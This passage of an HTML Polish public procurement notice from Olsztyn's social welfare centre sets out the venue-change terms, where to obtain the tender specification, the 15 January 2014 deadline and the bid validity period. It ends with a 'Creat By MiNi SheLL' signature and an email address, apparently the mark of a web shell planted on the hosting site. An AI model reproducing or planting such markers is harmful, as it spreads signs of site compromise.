-Zamawiający dopuszcza zmianę miejsca wypoczynku z przyczyn niezależnych od Wykonawcy, w okresie przed wystąpieniem takiej sytuacji z zastrzeżeniem, iż inne miejsce zaproponowane przez Wykonawcę będzie o standardzie nie gorszym niż zaproponowane przez Wykonawcę w ofercie o czym Wykonawca powiadomi Zamawiającego w formie pisemnej z załączeniem wykazu dot. ilości i jakości pomieszczeń oraz wyposażenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.olsztyn.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej Al. Marsz. J.Piłsudskiego 61A, 10-449 Olsztyn  III piętro pok. nr 314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2014 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej Al. Marsz. J.Piłsudskiego 61A, 10-449 Olsztyn  III piętro pok. nr 317(sekrtariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com